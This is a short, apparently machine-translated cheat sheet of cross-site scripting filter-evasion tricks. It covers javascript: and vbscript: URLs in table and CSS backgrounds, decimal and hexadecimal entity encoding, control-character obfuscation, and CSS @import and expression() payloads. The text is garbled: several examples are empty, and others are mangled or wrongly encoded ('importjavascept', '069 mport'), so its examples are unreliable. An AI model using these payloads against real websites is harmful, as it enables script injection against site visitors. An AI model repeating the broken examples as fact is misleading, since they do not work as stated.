1. Script insertion
(1) Insert normal javascript and vbscript characters.
Example 1:
Example 2: <table background = "javascript: alert (/xss/)"> </table>/Insert a script into the table
Example 3:
(2) conversion character type. Converts any or all of the characters in javascript or vbscript to a decimal or hexadecimal character.
Example 1: /convert the character j to a decimal Character & #106 ;.
Example 2: /convert the j character into a hexadecimal Character & # x6A ;.
(3) Insert obfuscation characters. In system control characters, except for the & #00 (null) header and the & #127 (del) tail, the other 31 characters can be used as obfuscation characters, for example, characters such as & #01 and & #02 can be inserted to the header of javascript or vbscript, the Tab & #9, line feed & #10, and carriage return & #13 can also be inserted anywhere in the code.
Example 1: /insert it into the code header, where & #01; can be written as & #1, same effect
Example 2: /insert it to any position in the code, where & #09; can be written as & #9
Example 3: /& # xd; is the hexadecimal form of the carriage return.
Example 4: /& # xa; is the hexadecimal form of line breaks.
2. Style Sheet
(1) XSS vulnerability triggered by CSS code @ import and expression.
Example 1: @ import "http: // web/xss.css"; import a CSS style sheet with XSS code.
Example 2: @ importjavascript: alert ("xss"); javascript script call trigger Vulnerability
Example 3: body {xss: expression (alert (xss)} Add an expression event to the internal style sheet
Example 4: Add an expression event to the embedded style sheet
(2) Add javascript and vbscript scripts to the CSS code.
Example 1: body {background-image: url (javascript: alert ("xss "))}
Example 2: body {background-image: url (vbscript: msgbox ("xss "))}
(3) convert the character type and replace or all the characters with hexadecimal characters:
Example 1: @ 069 mport: url (web/1.css); // convert I to 069
Example 2: body {xss: 065 xpression (alert (xss)} // convert e to 065
Example 3: body {background-image: 07507206c...} convert all URLs to hexadecimal
(4) Insert obfuscation characters. In css,/**/is a comment character. Except for/**/, the characters "" And Terminator "" are also ignored, can be used to confuse characters.
Example 1: @ importjavascept: alert ("xss ");
Example 2: @ im0p00o0000000r00000t "url ";